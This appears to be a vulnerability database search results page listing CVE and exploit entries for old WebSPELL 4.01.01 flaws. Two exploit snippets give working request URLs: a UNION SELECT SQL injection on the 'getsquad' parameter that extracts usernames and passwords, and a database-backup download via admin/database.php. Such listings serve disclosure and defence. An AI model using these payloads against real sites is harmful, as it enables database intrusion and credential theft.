7 matches found
EUVD-2006-5373
Malware in sbrugna...
CVE-2006-5388
SQL injection vulnerability in index.php in WebSPELL 4.01.01 and earlier allows remote attackers to execute arbitrary SQL commands via the getsquad parameter, a different vector than CVE-2006-4783...
CVE-2006-5388
Technical details about CVE-2006-5388 are not provided in the connected documents. The initial description mentions a SQL injection in WebSPELL 4.01.01 and earlier via the getsquad parameter, but no further specifics are supplied here. Monitor for updates.
webSPELL 4.01.01 - 'getsquad' SQL Injection
WebSPELL = 4.01.01 getsquad Remote SQL Injection Exploit by: Kiba EXPLOIT: http://PAGE/PATH/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+PREFIXuser/ REPLACE: if the website is http://yourwebsite.de/webspell/index.php PAGE with "yourwebsite.de" PATH with...
CVE-2006-4783
SQL injection vulnerability in squads.php in WebSPELL 4.01.01 and earlier, when registerglobals is enabled, allows remote attackers to execute arbitrary SQL commands via the squadID parameter...
CVE-2006-4783
WebSPELL 4.01.01 and earlier are affected by an SQL injection in squads.php when register_globals is enabled. The vulnerability allows remote attackers to inject arbitrary SQL via the squadID parameter, enabling unauthorized database commands. The available sources confirm the affected file and p...
webSPELL 4.01.01 - Database Backup Download
WebSPELL = 4.01.01 Accessible Database Backup Download Exploit Discovered by: Trex Visit: www.SecuritySector.org / www.UnderGround.ag Exploit: http://SITE/PATH/admin/database.php?action=write&userID=1 Solution: http://cms.webspell.org/index.php?site=files&file=15 milw0rm.com 2006-09-12...